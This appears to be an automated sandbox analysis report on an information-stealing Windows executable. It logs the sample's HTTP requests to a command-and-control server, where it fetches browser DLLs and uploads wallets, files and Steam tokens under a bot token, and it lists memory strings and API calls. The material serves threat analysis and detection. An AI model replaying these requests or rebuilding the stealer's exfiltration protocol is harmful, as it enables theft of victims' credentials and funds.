                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAKKKKJDBKKFIEBKEHDHost: 23.88.106.134Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="file"------ECAKKKKJDBKKFIEBKEHD--
                        Source: global trafficHTTP traffic detected: GET /566d6e1ec8db6394/freebl3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /566d6e1ec8db6394/mozglue.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /566d6e1ec8db6394/msvcp140.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /566d6e1ec8db6394/nss3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /566d6e1ec8db6394/softokn3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /566d6e1ec8db6394/vcruntime140.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 23.88.106.134Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBAKKECAEGCAKFIIIDHHost: 23.88.106.134Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------IDBAKKECAEGCAKFIIIDHContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------IDBAKKECAEGCAKFIIIDHContent-Disposition: form-data; name="message"wallets------IDBAKKECAEGCAKFIIIDH--
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFHIDGIJKJKECBGDBGHost: 23.88.106.134Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------HDAFHIDGIJKJKECBGDBGContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------HDAFHIDGIJKJKECBGDBGContent-Disposition: form-data; name="message"files------HDAFHIDGIJKJKECBGDBG--
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAEBFIJKEBGHIDHIEGIHost: 23.88.106.134Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file"------FCAEBFIJKEBGHIDHIEGI--
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIEHost: 23.88.106.134Content-Length: 99115Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAFBFBAAKECFIEBFIECHost: 23.88.106.134Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------BAAFBFBAAKECFIEBFIECContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------BAAFBFBAAKECFIEBFIECContent-Disposition: form-data; name="message"jbdtaijovg------BAAFBFBAAKECFIEBFIEC--
                        Source: Joe Sandbox ViewASN Name: ENZUINC-US ENZUINC-US
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02755610 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                        Source: unknownHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJEGIJEGDBFHDGCAFCAEHost: 23.88.106.134Content-Length: 213Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="hwid"8C19607774CC661179348------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="build"cuapfss------JJEGIJEGDBFHDGCAFCAE--
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/freebl3.dll
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/freebl3.dllYW
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/freebl3.dlleV
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/mozglue.dll
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/mozglue.dllAV
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/msvcp140.dll
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/nss3.dll
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/nss3.dllj9
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/nss3.dllpera
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/softokn3.dll
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/softokn3.dllOV
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/sqlite3.dll
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll3x
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll4
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.php
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.php)
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.php513e43049a24c4f8a56ff24fb86a0b
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.php6
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.php?S
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpC
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpGS
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpcS
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpdus.wallet
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpiSS
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpition:
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpm
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phppenSSH
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpwser
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpz
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134y
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr | String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr | String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr | String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr | String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000002.00000002.1824348994.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr | String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824142050.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr | String found in binary or memory: https://mozilla.org0/
Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr | String found in binary or memory: https://support.mozilla.org
Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: aspnet_regiis.exe, 00000002.00000003.1726461054.0000000022DDD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: aspnet_regiis.exe, 00000002.00000003.1726461054.0000000022DDD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr | String found in binary or memory: https://www.ecosia.org/newtab/
Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr | String found in binary or memory: https://www.mozilla.org
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/
Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/VxHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0
Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: aspnet_regiis.exe, 00000002.00000003.1787303428.000000002913A000.00000004.00000020.00020000.00000000.sdmp, ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: aspnet_regiis.exe, 00000002.00000003.1787303428.000000002913A000.00000004.00000020.00020000.00000000.sdmp, ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_02765700 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

                        System Summary

Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Static PE information: section name: A7B&<U
Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Static PE information: section name: (empty)
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Code function: 0_2_6CC22630 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2CED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C30B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C30B8C0 rand_s,NtQueryVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C30B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2AF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Code function: 0_2_6CC211C0
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Code function: 0_2_6CC22630
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Code function: 0_2_6CC22FB0
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Code function: 0_2_6CC22C50
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Code function: 0_2_6CC35465
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Code function: 0_2_6CC21000
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Code function: 0_2_6CC29A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2A35A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C31542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C31AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2E5C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2F2C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2B5440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C31545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C3034A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C30C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2B6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2AD4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2E6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2B64C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2CD4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2BFD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2CED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2D0512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C3085F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2E0DD0
